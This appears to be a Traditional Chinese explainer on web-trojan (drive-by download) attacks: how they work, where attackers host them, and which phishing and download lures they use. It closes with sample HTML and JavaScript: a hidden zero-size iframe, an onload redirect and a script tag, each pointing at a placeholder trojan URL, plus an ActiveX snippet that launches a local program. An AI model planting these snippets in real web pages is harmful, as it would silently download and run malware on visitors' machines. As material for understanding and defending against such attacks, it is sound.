攻擊原理:
網頁木馬實際上就是一個精心製作的 HTML網頁,駭客在這個網頁中使用Script語法或利用了IE的漏洞,讓IE在背景自動下載駭客放置在網路上的木馬並執行(安裝) ,使用者一旦點選超連結打開這個網頁,下載和執行(安裝)木馬的過程就自動開始進行。
網頁木馬攻擊管道與手法:
跳板:
- 自行架設釣魚網站
- 將網頁上傳到知名免費空間網站
- 入侵知名政府及企業網站上傳至該Web Server
管道:
- 釣魚郵件
- 討論區(P2P下載、MP3下載、小遊戲)
- 部落格(圖片、文章共享)
手法:
- 利用超連結
- 小遊戲下載
- 音樂、影片下載與線上觀看
- 利用圖片及廣告
網頁木馬常用HTML語法:
<body onload="windows.location='http://免費空間的木馬網址';"> </Body>
<html><body><iframe src="http://免費空間的木馬網址"width=0 height=0> </iframe> <img src="http://免費空間的圖片網址"></img> </body> </html>
<html><body><iframe src="http://免費空間的木馬網址"width=0 height=0></iframe> </body> </html>
document.write('<iframe width=0 height=0 src="http://免費空間的木馬網址"></iframe>');“
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://免費空間的木馬網址"> </SCRIPT>
<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT>
